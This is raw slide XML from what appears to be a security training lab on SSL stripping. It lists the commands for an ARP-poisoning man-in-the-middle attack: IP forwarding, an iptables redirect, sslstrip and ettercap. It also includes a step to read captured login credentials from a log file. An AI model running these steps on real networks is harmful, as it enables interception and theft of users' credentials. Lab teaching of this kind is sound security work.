      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4762" y="0"/>
            <a:ext cx="9153525" cy="3509962"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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274573" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1320165">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Actions on </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Objectives-</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>SSLStip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231140" y="1053846"/>
            <a:ext cx="8588375" cy="5806440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="1485900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Reading </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>transferred credentials is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-95" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>an  important objective for many</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>attackers.</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>In this lab we try to strip a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>connection to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>find</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>credentials!</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>•	On Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(192.168.248.134)</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t># echo "1" &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/proc/sys/net/ipv4/ip_forward</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" marR="5080" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t># iptables -t nat -A </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>PREROUTING </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-p tcp --destination-port 80</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-135" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-  j </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>REDIRECT </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>--to-port</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t># iptables -t nat</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-130" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>–L</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t># sslstrip -a -l 8080</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-125" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-k</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3350"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>On Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(192.168.248.134) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>in a new</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-35" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>terminal</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t># ettercap -TqM</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>arp:remote</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3350"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>On Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(192.168.248.134) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>in a new</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-65" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>terminal</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t># tail -f</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-120" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sslstrip.log</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="5562548"/>
            <a:ext cx="1600200" cy="1274445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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274573" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="596265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Lab – Actions on </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Objectives-</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>SSLStrip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231140" y="1130046"/>
            <a:ext cx="8547100" cy="2938145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="220345" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>On Windows machine, surf to Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>account  authentication page (i.e.  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/en-gb/account/)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> and  enter a dummy username and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>You should be able to see username and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>in sslstrip.log</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="5562548"/>
            <a:ext cx="1600200" cy="1274445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>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99060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0" y="0"/>
            <a:ext cx="9144000" cy="99060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1239837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="80808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0" y="0"/>
            <a:ext cx="9144000" cy="116242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0" y="0"/>
            <a:ext cx="9144000" cy="1162429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="3429000">
                <a:moveTo>
                  <a:pt x="0" y="3429000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144000" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3429000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="952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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920432" y="145287"/>
            <a:ext cx="7303134" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="6000" spc="-5" dirty="0"/>
              <a:t>DAY 3</a:t>
            </a:r>
            <a:endParaRPr sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1324136"/>
            <a:ext cx="9025571" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
